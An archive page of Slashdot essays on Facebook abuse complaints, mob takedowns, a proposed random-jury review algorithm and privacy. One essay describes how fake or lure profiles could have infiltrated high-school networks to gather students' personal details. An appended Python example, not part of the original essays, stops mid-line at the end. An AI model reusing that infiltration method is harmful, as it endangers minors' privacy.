Domain: peacefire.org
Stories and comments across the archive that link to peacefire.org.
Stories · 223
-
Anti-Porn Facebook Page is Deleted, Then Restored
Slashdot regular contributor Bennett Haselton writes: "An anti-porn organization's Facebook page is disabled by Facebook, and then resurrected. Was the page the victim of a 'complaint mob,' and could the previously-discussed 'voting algorithm' have saved the page from being shut down?"
Speaking of Facebook pages being unjustly shut down, on Monday the anti-porn Facebook page http://www.facebook.com/PornHarms/, run by the non-profit Morality in Media, was abruptly disabled by Facebook. The page had 35,000 "likes" at the time the plug was pulled. Morality in Media CEO Patrick Trueman, who also ran the Facebook page, says he never received any warning from Facebook before the page was removed.
Some time on Wednesday, the page was restored. I had emailed a contact at Facebook to ask why the page was shut down, and he replied later to say that it had been deleted in error and the page had been restored. (He didn't say whether the page was on track to being restored anyway, or whether it would have remained down indefinitely if I hadn't pinged him.)
Facebook did not respond to inquiries as to why the page was removed, but as Evgeny Morozov has pointed out regarding political pages (and as many other users have heard from people's anecdotal experiences having pages pulled without explanation), it's common for pages on Facebook and YouTube to get removed that were almost certainly not violating those sites' Terms of Service. If enough users decide to file "abuse complaints" simultaneously against a piece of content on Facebook or YouTube, this has a good chance of getting the content removed, whether the complaints were legitimate or were simply part of an organized campaign of filing false complaints.
Meanwhile, I correspond with dozens of people every week on Facebook (usually people who use my proxy sites to get on Facebook at school or work), and about once a week I get an automated message from Facebook that says, "You have been sending harassing messages to other users," and goes on to sternly list the types of messages that violate Facebook's TOS. (Only twice has this resulted in my account actually getting locked, and it was unlocked after I bugged my friend at Facebook about it.)
I figure that these are either the result of users clicking "Report this message" accidentally, or parents hacking into their kids' accounts, reading their messages, and then trying to get the account shut down of the person who was talking to their kid about proxy sites. In either case, I assume it's not the result of an "organized campaign," but perhaps your account gets locked if you're unlucky enough that two or three people file complaints within the same short time frame.
So I have no reason to doubt Mr. Trueman's claim that the PornHarms Facebook page never contained any content that violated Facebook's TOS. He says the page mostly contained links to academic research supposedly demonstrating the harmful effects of pornography, and that while the target audience was adult academics, there was nothing in the content that most parents would consider inappropriate for underage viewers. There was certainly no actual pornography on the page, not even in censored form with the fun parts blurred out (although I didn't check every single academic paper linked from the site to see if any of them might have used pixellated/censored porn for illustrative purposes). Trueman also says that they prevented third-party users from posting on the PornHarms page directly, and regularly monitored the page's content to remove any "inappropriate" comments that users had written in response to the officially authorized posts. (Of course, even if the page admins hadn't done this, inappropriate comments should be the basis for penalizing the user who posted them, not the Facebook page that they were posted on, but it was a moot point in this case.)
Because of the word "Pornography" in the title of the page, it's also of course possible that a human at Facebook actually did review the complaints, but thought the word "pornography" meant the page was a porn-trading hub, without looking too closely at it. (It's also possible that the word triggered an automated filter at Facebook. Obviously, there is no filter pre-emptively preventing pages with words like "pornography" in the title from being created, since otherwise the page never could have existed in the first place. But it's possible that an automated algorithm does something like the following: If a page receives X complaints within time period Y, and the page contains certain keywords in the title or the content, then shut down the page automatically.)
Previously I'd suggested an algorithm that Facebook could use to stop users from coordinating phony complaints in order to shut a page down. The gist was: If a page receives a sufficient number of complaints, have the page reviewed by a random sample (chosen by Facebook) of Facebook users who had signed up to review abuse cases in situations such as these. If enough of those users vote that the page was violating the TOS, the page gets shut down, but if not, then it stays up. What makes this algorithm difficult to abuse, is that in order for a "coordinated mob" to swing the vote of the jury, they would have to comprise a majority (or a significant minority) of the entire set of users that the randomly-selected jury could have been chosen from -- a difficult task if thousands of people have signed up as content reviewers. I offered a $100 prize to be split between readers who submitted the best suggested improvements or criticisms of the idea; their ideas were summarized in a follow-up article. A couple of readers commented that there was no point in debating the idea since I don't work for Facebook and have no influence there; they have a point, but the idea has to start somewhere. If engineers at Facebook are looking for a way to fix the problem, one thing that can be said about this suggestion is that it was posted to a large audience of smart people, and several readers suggested very clever improvements, while nobody found any obviously fatal flaws in it.
It seems pretty likely that a process like that for reviewing abuse complaints, would have saved the Pornography Harms page from being yanked from Facebook. Anybody who seriously reviewed the page's contents for more than twenty seconds would have understood the page's real purpose and seen that it was not actually distributing pornography or otherwise violating the Facebook TOS. In my experiences posting surveys on sites like Mechanical Turk, where you can pay users a penny apiece for filling out surveys or performing other tasks, I've gotten the impression that people will take such tasks seriously, even for zero (or virtually zero) pay, if they find them interesting. In the case of the Facebook "jurors" who are voting on whether a page violated the TOS, you're talking about users who voluntarily signed up to be jurors, after all -- not underpaid workers grinding through as many tasks as they can squeeze into their working hours.
Finally, it would be easy to point out the irony of a pro-censorship group being censored (and some people did, on the mailing lists where I saw this news announced), but I don't think that's really fair to Morality in Media, since even MIM doesn't oppose people's right to express their opinions in favor of pornography. Likewise, MIM presumably supports the use of Internet blocking programs in schools, even though their Facebook page (as well as the companion website PornHarms.com) would probably be blocked by default by most Internet blockers because of the word "porn" in the URL -- but even that is not as richly ironic as it would seem. Neither Morality in Media, nor almost anyone else, is in favor of political sites about pornography being blocked because of the word "porn" in the address; presumably they'd just want the error corrected by the blocking company, and if a left-wing site on the opposite side of the debate happened to be blocked because of the word "porn" in the URL, I have no reason to think that Morality in Media would be opposed to correcting that error and unblocking that site as well. So this really isn't a case of them being given "a taste of their own medicine."
No, the real irony in this particular case -- at least, if I did have a role in getting their Facebook page restored -- is that not only would I support their right to express their view (duh), I would support students' right to bypass their school's Internet blocker to view the page from school if they had to, and I would even support the right of under-18-year-olds to view the page even if their parents were specifically trying to block them from it. I highly doubt that even anyone at Morality in Media would go that far.
-
Privacy Hacking Worse Than PR Flacking
Here's frequent Slashdot contributor Bennett Haselton who writes "Facebook apparently hired a PR firm that tried to seduce some pundits into writing negative editorials about Google. The 'attack angle' would have been that Google was endangering users' privacy by scraping information about users from Facebook and making such information easier to find with a Google search." Hit the link below to read the rest of Bennett's story.
The reliably cynical Seth Finkelstein commented that the attempted editorial-planting was just "often implicit dealing made explicit", (i.e. that pundits are drafted as fronts for corporate publicity campaigns like this all the time, and that the PR firm in this case spoiled the game by rudely blurting out the terms of the deal, like a guy offering to buy a girl dinner if she'll sleep with him). Steven Levy of Wired opined that with regard to the privacy issues, Facebook was the real villain for exposing information in the first place that many users would rather keep private.
Some perspective here: In 2008, I was corresponding with a high school student (using one of the Circumventor sites to get around their local school Internet blocker, naturally) who mentioned that he was able to see all the personal information of other students in his Facebook high school network -- including email address, phone number, and home address, if the user had uploaded that information to Facebook -- even if those users had not confirmed him as a friend. (Facebook allows users to join one or more "networks" indicating their school affiliation, workplace, city of residence, etc. -- such networks are distinct from Facebook groups and fan pages.) Double-checking with a few more users in the same network and in other high school networks, we found that it really was possible for any member of a high school network to view the profiles of any other member of that high school network and see all of their personal information.
Unlike other types of "networks" on Facebook, it is not possible to join a high school network simply by specifying it in your preferences. However, all of the students that I corresponded with said that in order to join their high school networks, they simply had to request to join the network, and then get a friend request confirmed by an existing member of that high school network. Which means that conning your way into the network would be easy: either (1) create a profile with the name and photo of a real student at that school, and send out friend requests to that student's friends, hoping that one of them would confirm you (not remembering that they had already friended that person under their real account), or (2) create a profile with a hot girl's picture and send out random friend requests to a bunch of guys in the network. Once you got confirmed, you'd have access to all the personal information that any student in that high school had posted on their profile. (I hasten to add that we did not actually try either of these things, but it stands to reason that it would work, since it wasn't functionally any different from what all of those students actually had to do in order to join their networks in the first place!)
I sent a message to Facebook's security team about this, and got a non-form-letter response from a real person -- their reply, however, was that this behavior was by design:
We believe this allows for greater sharing and helps make the site more useful for people, though we also recognize the potential for misuse. That's why we've built a peer verification system around the joining of high school networks. We also use automated systems to detect and flag anomalous behavior, like lots of messages sent to non-friends or a high percentage of ignored friend requests.
Smart, but probably not secure enough. For one thing, if someone is creating disposable accounts to send out friend requests in hopes of getting into a high school network, it only has to work once, so even if most of their accounts get flagged for "anomalous behavior," they only need one that doesn't get flagged. And even if that account does get flagged and cancelled later, by that time it might be too late, if they've already grabbed enough users' information. In any case, some time between 2008 and 2011, Facebook did change the behavior of high school networks so that members can no longer see the personal information of other members without a confirmed friend request. But this loophole was not that difficult to find, and it's likely that at least a few other users had discovered the same issue.
Now, imagine what would have happened if Facebook had announced that, for a fee of a few hundred dollars, they were offering CDs for sale containing the names, addresses, mobile phone numbers, and instant messenger names of all the high school students on their site (along with, of course, all the photos those students had posted of themselves). It goes without saying that after the class action lawsuits had finished, there'd be nothing left of the company but a smoldering crater. Now, I'm not suggesting that Facebook's security policy for high school networks was anywhere near as bad as selling CDs with all the personal information of their high school users, but it's worth thinking about why it should not be considered as bad. In either case, anybody willing to spend a few hundred dollars (or, equivalently, a few hundred dollars' worth of effort -- the effort to discover the loophole, and then to crank out the friend requests) could obtain the personal information of as many high school students as they wanted. What's the difference?
Well, obviously, there's the message that it would send if a company like Facebook offered to sell CDs full of users' personal information. It would lower the bar for future behavior by similar companies, it would make users extremely cynical about trusting the motivations of social networking sites, and in the long run it might even cause courts to decide that users had no reasonable expectation of privacy when joining those sites, because it was "common knowledge" and "common practice" that those sites offered up people's personal information for sale! On the other hand, if Facebook makes that information available indirectly through "benign neglect" -- by, for example, forcing you to create a fake high school profile and send out a bunch of friend requests and create a new profile from scratch if your first one gets canned -- that's far less likely to cause the side effects I just listed. MySpace is not going to get the idea that it's OK to start selling CDs of users' personal information because, hey, Facebook let people pry out the same information if they jumped through enough hoops.
But what this means is that fairly mild privacy issues, if they arise as a result of deliberate choice by a company like Facebook, are likely to get more press attention than far more serious privacy issues that arise as a result of benign neglect. Because when Facebook makes a deliberate choice that affects user privacy (like sharing users' preferences with Pandora), the pundits and the public are reacting to the direct privacy implications of that action, plus all the auxiliary issues, like the "message" that it sends, and the precedent that it sets for future actions by that company and other companies. Whereas if an issue arises as a result of neglect (as in the case of PlayStation Network users' credit cards being stolen), people are reacting only to the direct privacy implications of the incident, so the issue has to be much more serious to get the equivalent amount of press.
For example, the right reason to be concerned about Facebook sharing users' personal information with Pandora, was the principle that it violated -- if users say "no" to sharing their personal information, Facebook shouldn't be allowed to switch that choice unilaterally. But as for the practical implications -- come on. Facebook and Pandora are both big faceless corporate behemoths as far as we're concerned, so why would we trust one with our personal data but not the other? Besides, what if Facebook had simply bought out Pandora? Then they could share all of our personal information with all the employees of the newly merged Facepanbookdora, and the exact same people would have had access to the exact same data, but it wouldn't have violated the agreement against sharing information with "third parties," because they wouldn't be a third party any more.
When I first found that email addresses of Ameritrade customers had been obtained by a pump-and-dump stock spammer, I was sure (as were most readers, probably) that Ameritrade was not deliberately selling its customers' email addresses; I figured that they had simply left their database inadequately secured, and some third party had broken in and stolen it. On the other hand, because the incident happened as a result of benign neglect and not deliberate choice, I figured the incident would not garner much press as a result, and that seems to have been the case -- the wholesale thievery of Ameritrade customers' personal information by financial criminals received far less press attention than, say, Facebook's decision to change their privacy policy so they could share information with Pandora.
What this means is that if you're an ardent cyber-rights hippie like me, then yes, you should care about the privacy issues that set the blogosphere afire, even if they're fairly minor privacy issues that are magnified out of proportion because they speak to the deliberate intentions of the companies involved. It matters that Facebook decided one day to share our music preferences with Pandora, even if it doesn't hurt anyone.
On the other hand, if you simply care about threats to your personal privacy, then you should heavily discount the noise being made about deliberate choices taken by companies like Facebook, and pay far more attention to dangers of benign neglect by the company guarding your privacy, when that benign neglect is exploited by malicious outsiders. If you have a stalker and you're worried about them finding your Facebook profile, it makes no sense to be worried about Google scraping the information from the public version of your Facebook profile, if it's the same information that your stalker would be able to see anyway if they were logged in to Facebook themselves. It's far more likely that your stalker would try to exploit a weakness in Facebook's privacy settings -- for example, ingratiating themselves with one of your Facebook friends and getting them to accept a friend request, so that they can then see any information on your Facebook profile that is viewable to "friends of friends." Maybe you knew about that already, but if you didn't, you wouldn't know it from reading all the punditry about the Facebook-Google kerfuffle.
-
My Crowdsourced Follow-Up About Crowdsourcing
Slashdot regular contributor Bennett Haselton writes "In my last article, I proposed an algorithm that Facebook could use to handle abuse complaints, which would make it difficult for co-ordinated mobs to get unpopular content removed by filing complaints all at once. I offered a total of $100 for the best reader suggestions on how to improve the idea, or why they thought it wouldn't work. Read their suggestions and decide what value I got for my infotainment dollar."
In my last article, I proposed an algorithm that Facebook could use to handle abuse complaints, which would scale to a large number of users while also making it difficult for co-ordinated mobs to get unpopular content removed by filing complaints all at once. I offered a total of $100 to readers sending in the best suggestions for improvements, or alternative algorithms, or fatal flaws in the whole idea that would require starting from scratch. As the suggestions were coming in, Facebook obligingly kept the issue in the news by removing a photo of two men kissing from a user's profile, sending a form letter to the user that they had violated Facebook's prohibition on "nudity, or any kind of graphic or sexually suggestive content". (It would be a cheap shot to say that a photo of a man and a woman kissing probably would not have been removed; in truth, probably just about anything will get removed from Facebook automatically if enough users file complaints against it, which is the problem for unpopular but legal content.)
How would these complaints have been handled under my proposed algorithm? The gist of my idea was that any users could sign up to be voluntary reviewers of "abuse complaints" filed against public content on Facebook. Once Facebook had built up a roster of tens of thousands of reviewers, new abuse complaints would be handled as follows. When a complaint (or some threshold of complaints) is filed against a piece of content, a random group of, say, 100 users could be selected from the entire population of eligible reviewers, and Facebook would send them a request to "vote" on whether that content violated the Terms of Service. If the number of "Yes" votes exceeded some threshold, the content would be removed (or at least, put in a high-priority queue for a Facebook employee to determine if the content really did warrant removal). The main benefit of this algorithm is that it would be much harder for co-ordinated mobs to "game the system", because in order to swing the vote, they would have to comprise a significant fraction of the 100 randomly selected reviewers, and to achieve that, the mob members would have to comprise a significant fraction of the entire reviewer population. This would be prohibitively difficult if hundreds of thousands of users signed up as content reviewers.
All of the emails I received -- not just "almost" all of them, but really all of them -- contained some insightful suggestions worth mentioning, although there was some duplication between the ideas. If you didn't see the last article, you might consider it worth while to stop reading before proceeding further, and mull over the description of the algorithm above to see how you would improve it. Then read the suggestions that came in to see how well your ideas matched up with the submissions I received.
The upshot is that nobody found what I believed to be completely fatal flaws, although one reader brought something to my attention that might cause trouble for the algorithm after a few more years. Beyond that, reader suggestions could be divided essentially into two categories. The first category of suggestions related to ensuring that the basic premise would actually work -- that the votes cast by a random sample would be representative of general user opinion, and could not be gamed by a coordinated mob or a very resourceful cabal trying to game the system. The second category of suggestions started by assuming that the voting system would work, and suggested other features that could be added to the algorithm -- or, in one case, an entire alternative algorithm to replace it.
To begin with the attacks and counter-attacks against the basic voting algorithm. Walter Freeman and Haydn Huntley independently suggested monitoring for users who vote in a small minority in a significant portion of vote-offs, and reducing their influence in future votes (by either not inviting them to vote on future juries, or sending them the future invites but then ignoring their votes anyway). The assumption is that if a user is frequently among the 10% who vote "Yes [this is abuse]" when the other 90% of respondents are voting "No [this is not abuse]", or vice versa, then that user is voting randomly, or their point of view is so skewed that their votes could safely be ignored even if they are sincere. I like the idea of eliminating deadweight voters, but this might also incentivize voters to vote the way they think the crowd would vote, instead of voting their true opinions -- for example, if they were called to vote on an anti-Obama page that showed Obama wearing a Hitler mustache. Some people's knee-jerk reaction would be to call the page "racist" or "hate speech" or "a threat of violence", even though comparing Obama to Hitler is not, strictly speaking, any of those things. If I were voting my honest opinion, I would count that page as "not abuse". But if I knew that I were voting along with dozens of other people, and my future voting rights might be revoked if I didn't vote with the majority, I might be tempted to vote "abuse".
Similarly, Walter Freeman and reader "mjrosenbaum" both suggested setting deliberate traps for deadweight users, by creating artificial cases where the answer was pre-determined to be obviously yes or obviously no, calling for votes, and revoking privileges for users who gave the wrong answer. This would eliminate the problem of borderline cases like the one above, where smart users think, "I suspect the majority will give the wrong answer, so I'm just going to go with the crowd, to keep my voting rights." On the other hand, it's more labor for Facebook to create the cases, and any public content authored by them -- especially content that is deliberately crafted to be "questionable" -- would probably have to run a gauntlet of being reviewed by lawyers and PR mavens before being released. My suggestion would be to use these artificial scenarios periodically to make sure that the system is working (i.e. that juries are giving the right answers), but it would be too inefficient to use it to try and weed out problem voters.
In fact, these and several other suggestions fell into a category of ideas that could possibly improve the efficiency of the algorithm by reducing voter shenanigans (where "efficient" means that fewer users have to be invited to each vote-off in order to get statistically valid results), but might not be worth the effort. As long as most of the votes cast by users are sane and sincere, all you have to do is invite enough voters to a vote-off, and the majority will still get the correct answer most of the time, even if you have problem voters in the system. That's the simplest possible algorithm. The more complicated an algorithm you come up with, the more likely that Facebook (or any other site you recommended this to) would just throw up their hands and say, "Sounds too hard", and leave the idea dead in the water. That's why I like the algorithm as lean and tight as possible.
So it's not quite like designing an algorithm for your own use, where you could feel free to introduce more complications as long as you're responsible for keeping track of them. In recommending an algorithm for widespread adoption, the basic form of the algorithm should be as simple as possible. In the case of the voting algorithm some interesting wrinkles may come up if you don't eliminate problem voters, but this is not fatal to the idea as long as it's still true that, given a large enough random sample of voters, the majority will tend to vote the correct answer.
For example, James Renken pointed out that as voters dropped out due to boredom, the remaining users casting votes would tend to be either (1) weirdos who just wanted to view questionable material; or (2) prudes bent on removing as much material from Facebook as possible. But that's OK, as long as those two groups vote sanely enough (or as long as there are enough sane users outside those two groups) that material which does violate the TOS, tends to get more "Yes [this is abuse]" votes than material that doesn't. Then all you have to do is make the jury size large enough to make a statistically significant distinction between those two cases.
Similarly, Joshua Megerman suggested surveying users for their religious, political, and other beliefs when they sign up as volunteer reviewers (they could of course decline the survey). This makes it possible, insofar as people answer truthfully, to make sure that a jury is composed of a group with diverse belief sets. (On the other hand, users could game the system by reporting beliefs that are the opposite of what they truly feel. For example, if you're a leftist, register as a right-winger. Then when an abuse case comes before you, if it's a piece of content more offensive to leftists, then the real leftists on the jury will tend to vote against it -- but as a registered right-winger, you'll be able to cast a vote against it as well, and you'll be displacing a real right-wing voter who probably wouldn't have voted that way, so your vote will be worth more!) Again, it's fine if Facebook wants to do this, but even without collecting this data and simply selecting jurors at random, it should still be true that genuinely abusive pages get more "Yes" votes in a jury vote, than non-abusive pages.
Lastly in the "keep the jurors honest" category, Paul Ellsworth suggested allowing jurors to anonymously review each other -- when a given juror is chosen for the "hot seat" (perhaps randomly, perhaps as a result of a history of skewed voting), other jurors are randomly selected from the voting pool, to review that juror's voting record and decide whether that juror has been voting honestly and judiciously, or not. When I first read this idea, I instinctively thought that because a contaminated jury pool would be reviewing itself, it would not be able to reduce the percentage of problem voters, but a little more thought revealed that this isn't true. Suppose initially your jury pool consists of 80% "honest voters" and 20% "dishonest voters", that honest voters who review the voting record of another voter will always vote correctly whether that person is "honest" or "dishonest", and that dishonest voters will always vote incorrectly. It's still the case that when a voter's record is reviewed by a panel of, say, 20 other voters, virtually 100% of the time the majority will get the right answer. If you strip voting rights from a voter whenever a jury of other voters determines them to be a "dishonest voter", then over time, the percentage of honest voters in the system will creep from 80% to 100%. So again, this might work, and again, it might just be adding unnecessary complexity if the basic algorithm could work without it.
Note that none of these precautions would address the case of a "sleeper" voter -- a voter who joins the system with the sole intention of voting incorrectly on particular types of cases (perhaps planning on voting "yes" to shut down pages made by a particular organization, or pages advocating a particular view on a single issue), while still planning to vote correctly on everything else. By voting honestly in all other cases, they prevent themselves from being flagged by the system for casting too many minority votes, or from being blacklisted by other jurors for having a questionable overall voting record. The only real way I can see to address this problem is to hope that such users are outnumbered by the honest users in the system, and that juries are large enough that the chances of "rogue voters" gaining a majority on any one jury are nearly zero.
Which brings us to the one potentially fatal weakness in the system that I'm aware of: reader George Lawton referred me to a program run by the U.S. government to create armies of fake accounts to infiltrate social media, named, apparently without irony, Earnest Voice:
The project aims to enable military personnel to control multiple 'sock puppets' located at a range of geographically diverse IP addresses, with the aim of spreading pro-US propaganda.
An entity with the resources of the U.S. military could potentially create enough remote-controlled voters to overwhelm the system. I'm not sure if there is a way to deal with a system if the majority of voters are compromised. Presumably by making all decisions appealable to a core group of trusted Facebook employees at the top (although this then creates a bottleneck and limits scalability, especially if filing an appeal is free and all the parties who lose abuse cases are constantly filing appeals to the next level up).
Now. On to the second category of suggestions: Assuming the majority of voters are honest, what other features would be desirable to build into the system?
Walter Freeman, on the subject of filing appeals, suggested putting appealed pages in a special queue where they could be publicly viewed and users could comment on the ongoing appeals process, in addition to reading arguments posted by either side; this also negates the censorship itself due to the Streisand effect. I agree, but it's not obvious why this is a desirable feature. This does create perverse incentives, since some users could get extra traffic for their content by creating a page that makes whatever argument you're trying to promote, spiking it with some TOS-violating content, waiting for the page to get shut down, appealing the decision, and enjoying all the extra Streisand attention that it gets while on public display during the "appeal".
Meanwhile, James Renken pointed out that the system would work best for content that was originally public anyway, like a controversial Facebook page or event. If someone filed a complaint regarding a private message that they received, and they wanted a "jury vote" about whether the content of the message constituted abuse, then either the sender or the recipient would have to waive their right to privacy regarding the message before it could be shared with jurors. If the message really was abusive, then in some cases the recipient might waive their privacy rights -- reasoning that they didn't mind sharing the nasty message that someone sent them, in order to get the sender's account penalized. The problem arises if the message also contains sensitive personal facts about the recipient, which they wouldn't want to share with anonymous jurors. The system could allow them to black out any personal information before submitting the message for review, but that creates a recursive problem of abuse within the abuse system -- how do you know that someone didn't alter the content (and thus the offensiveness) of the message through their selective blacking-out? So it's not obvious whether this idea could be applied to non-public content at all.
Reader George Lawton suggested allowing content reviewers to vote on the funniest or weirdest content they had to review, to be posted in a public "Hall of Infamy". I love the thought of this, but I think Facebook's lawyers would be uncomfortable glamorizing anything questionable even if it were ultimately voted to be non-abusive (and certainly if it was voted to be abusive). Besides, this also has the perverse-incentives problem -- tie your message to something that you know will not only get an abuse complaint, but will hopefully end up in the Hall of Weird. (Even without the abuse jury system, there are already plenty of incentives for people to make a political point and hope that it will go viral.)
David Piepgrass suggested that new content reviewers should be allowed to specify certain types of content that they don't want to be asked to review -- nudity, graphic violence, etc. This sounds like a good idea. He adds that users probably shouldn't be able to opt-in only to review certain categories of content (or jurors might sign up only to review nudity, and then who would be left to review the death threats?).
Finally, in the other corner: Jerome Shaver suggested bypassing the jury voting system altogether and working on a heuristic algorithm to determine when abuse reports were being submitted by organized mobs of users, based on the patterns shown by mutual friendships between the users filing the abuse reports. The difficulties in designing such an algorithm are too complicated to summarize quickly, and could fill an entire separate article. (Convince yourself that it's not an easy problem to solve. You can't just ignore abuse complaints from clusters of users that have many mutual friendships, because it can happen that real tight-knit communities of users might file abuse complaints against a piece of content, where the complaints are actually genuine.) But again, there is the problem that if a proposed solution is too complicated or too nebulous, Facebook has the excuse that they are "weighing several options", that they're "already working on something similar internally", etc. The jury vote system has the advantage that it can be described in just a few sentences, and the general public always knows whether it has been implemented or not -- which means that as long as abuses of the complaint system continue, people can ask, "Why doesn't Facebook try this?"
You'll notice this is just a laundry list of the ideas I received, without any definitive conclusions about which ones are good or bad, but that's all I was going for. The original algorithm, I could argue with the force of mathematical proof that, under certain reasonable assumptions, it would work. There's no such proof or disproof for any of the suggested modifications, so I don't feel as strongly about any of them. But at the top of the article I suggested for readers to stop reading and see how many of these ideas they could come up with on their own. How did you do?
The final honor roll of readers who were each the first, or only, person to submit an original idea: Walter Freeman (bonus points for getting in several good ones), James Renken, Joshua Megerman, Paul Ellsworth, George Lawton, Jerome Shaver, and David Piepgrass. Most of them volunteered to donate their winnings to charity, and agreed to let me donate their share to Vittana, which arranges microloans to college students in developing countries. One preferred a charity of their choosing, and only one actually kept the money. To be clear, for future contests, it's awesome if you want to donate the money to charity, but it's not dickish to keep it. That was the original deal after all.
So, all very clever and interesting suggestions, some of which might inspire readers to keep coming up with their own further variations. I said which ideas I probably would have incorporated and which ones I wouldn't, and I'm sure many of you would tell me that I'm wrong on some of those points. Although from here on out you're doing it for free.
-
Crowdsourcing the Censors: A Contest
Frequent contributor Bennett Haselton is back with an article about how sites with huge amounts of user-generated content struggle to deal with abuse complaints, and could benefit from a crowd-sourced policing system similar to Slashdot's meta-moderation. He writes "In The Net Delusion, Evgeny Morozov cites examples of online mobs that filed phony abuse complaints in order to shut down pro-democracy Facebook groups and YouTube videos criticizing the Saudi royal family. I've got an idea for an algorithm that would help solve the problem, and I'm offering $100 (or a donation to a charity of your choice) for the best suggested improvement, or alternative, or criticism of the idea proposed in this article." Hit the link below to read the rest of his thoughts.
Before you get bored and click away: I'm proposing an algorithm for Facebook (and similar sites) to use to review "abuse reports" in a scalable and efficient manner, and I'm offering a total of $100 (or more) to the reader (or to some charity designated by them) who proposes the best improvement(s) or alternative(s) to the algorithm. We now proceed with your standard boilerplate introductory paragraph.
In his new book The Net Delusion: The Dark Side of Internet Freedom, Evgeny Morozov cites examples of Facebook users organizing campaigns to shut down particular groups or user accounts by filing phony complaints against them. One Hong-Kong-based Facebook group with over 80,000 members, formed to oppose the pro-Beijing Democratic Alliance for the Betterment and Progress of Hong-Kong, was shut down by opponents flagging the group as "abusive" on Facebook. In another incident, the Moroccan activist Kacem El Ghazzali found his Facebook group Youth for the Separation between Religion and Education deleted without explanation, and when he e-mailed Facebook to ask why, his personal Facebook profile got canned as well. Only after an international outcry did Facebook restore the group (but, oddly, not El Ghazzali's personal Facebook account), but they refused to explain the original removal; the most likely cause was a torrent of phony "complaints" from opponents. In both cases it seemed clear that the groups did not actually violate Facebook's Terms of Service, but the number of complaints presumably convinced either a software algorithm or an overworked human reviewer that something must have been inappropriate, and the forums were shut down. The Net Delusion also describes a group of conservative Saudi citizens calling themselves "Saudi Flagger" that coordinates filing en masse complaints against YouTube videos which criticize Islam or the Saudi royal family.
A large number of abuse reports against a single Facebook group or YouTube video probably has a good chance of triggering a takedown; with 2,000 employees managing 500 million users, Facebook surely doesn't have time to review every abuse report properly. About once a month I still get an email from Facebook with the subject "Facebook Warning" saying:
You have been sending harassing messages to other users. This is a violation of Facebook's Terms of Use. Among other things, messages that are hateful, threatening, or obscene are not allowed. Continued misuse of Facebook's features could result in your account being disabled.
I still have no idea what is triggering the "warnings"; the meanest thing I usually say on Facebook is to people who write to me asking for tech support (usually with the proxy sites to get on Facebook at school), when they say "It gives me an error", and I write back, "TELL ME THE ACTUAL ERROR MESSAGE THAT IT GIVES YOU!!" (Typical reply: "It gave me an error that it can't do it." If you work in tech support, I feel your pain.) I suspect the "abuse reports" are probably coming from parents who hack into their teenagers' accounts, see their teens corresponding with me about how to get on Facebook or YouTube at school, and decide to file an "abuse report" against my account just for the hell of it. If Facebook makes it that easy for a lone gunman to cause trouble with fake complaints, imagine how much trouble you can make with a well-coordinated mob.
But I think an algorithm could be implemented that would enable users to police for genuinely abusive content, without allowing hordes of vigilantes to get content removed that they simply don't like. Taking Facebook as an example, a simple change in the crowdsourcing algorithm could solve the whole problem: use the votes of users who are randomly selected by Facebook, rather than users who self-select by filing the abuse reports. This is similar to an algorithm I'd suggested for stopping vigilante campaigns from "burying" legitimate content on Digg (and indeed, stopping illegitimate self-promotion on Digg at the same time), and as a general algorithm for preventing good ideas from being lost in the glut of competing online content. But if phony "abuse reports" are also being used to squelch free speech in countries like China and Saudi Arabia, then the moral case for solving the problem is all the more compelling.
Here's how the algorithm would work: Facebook can ask some random fraction of their users, "Would you like to be a volunteer reviewer of abuse reports?" (Would you sign up? Come on. Wouldn't you be a little bit curious what sort of interesting stuff would be brought to your attention?) Wait until they've built up a roster of reviewers (say, 20,000). Then suppose Facebook receives an abuse report (or several abuse reports, whatever their threshold is) about a particular Facebook group. Facebook can then randomly select some subset of its volunteer reviewers, say, 100 of them. This is tiny as a proportion of the total number of reviewers (with a "jury" size of 100 and a "jury pool" of 20,000, a given reviewer has only a 1 in 200 chance of being called for "jury duty" for any particular complaint), but still large enough that the results are statistically significant. Tell them, "This is the content that users have been complaining about, and here is the reason that they say it violates our terms of service. Are these legitimate complaints, or not?" If the number of "Yes" votes exceeds some threshold, then the group gets shuttered.
It's much harder to cheat in this system, than in an "abuse report" system in which users simply band together and file phony abuse reports against a group until it gets taken down. If the 200 members of "Saudi Flagger" signed up as volunteer reviewers, then they would comprise only 1% of a jury pool of 20,000 users, and on average would only get one vote on a jury of 100. You'd have to organize such a large mob that your numbers would comprise a significant portion of the 20,000 volunteer reviewers, so that you would have a significant voting bloc in a given jury pool. (And my guess is that Facebook would have a lot more than 20,000 curious volunteers signed up as reviewers.) On the other hand, if someone creates a group with actual hateful content or built around a campaign of illegal harassment, and the abuse reports start coming in until a jury vote is triggered, then a randomly selected jury of reviewers would probably cast enough "Yes" votes to validate the abuse reports.
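The sampling argument above and the peer-review panel estimate in the follow-up article (80% honest voters, a panel of 20) both reduce to the same hypergeometric tail. The following is an added example, not code from the article or from Facebook; the function names, the strict-majority thresholds (51 of 100, 11 of 20), the 20,000-voter pool for the peer-review case and the 1e-6 risk budget are assumptions, since the article leaves the threshold open.

```python
"""Added example: capture odds for a randomly drawn abuse-review jury.

Pool 20,000, jury 100, 200 colluders, and the 80%-honest panel of 20 are
the article's numbers. Thresholds and the risk budget are assumptions.
"""
from math import comb


def capture_probability(pool, jury, colluders, seats_needed):
    """P[at least seats_needed jury seats go to colluders].

    Jurors are drawn uniformly without replacement, so the number of
    colluders seated is hypergeometric. The sum is done in exact integer
    arithmetic; only the final ratio becomes a float.
    """
    if not (0 <= colluders <= pool and 0 < jury <= pool):
        raise ValueError("need 0 <= colluders <= pool and 0 < jury <= pool")
    if seats_needed <= 0:
        return 1.0
    most_possible = min(jury, colluders)
    if seats_needed > most_possible:
        return 0.0
    honest = pool - colluders
    ways = sum(comb(colluders, k) * comb(honest, jury - k)
               for k in range(seats_needed, most_possible + 1))
    return ways / comb(pool, jury)


def expected_colluder_seats(pool, jury, colluders):
    """Mean number of jury seats held by the colluding bloc."""
    return jury * colluders / pool


def max_tolerable_colluders(pool, jury, seats_needed, risk):
    """Largest colluding bloc whose capture probability stays <= risk.

    Capture probability never decreases as the bloc grows, so a bisection
    over the bloc size finds the boundary.
    """
    if capture_probability(pool, jury, pool, seats_needed) <= risk:
        return pool
    lo, hi = 0, pool  # invariant: P(lo) <= risk < P(hi)
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if capture_probability(pool, jury, mid, seats_needed) <= risk:
            lo = mid
        else:
            hi = mid
    return lo


if __name__ == "__main__":
    POOL, JURY, MOB = 20_000, 100, 200  # figures from the article
    MAJORITY = JURY // 2 + 1            # assumed removal threshold

    print("expected mob seats      :",
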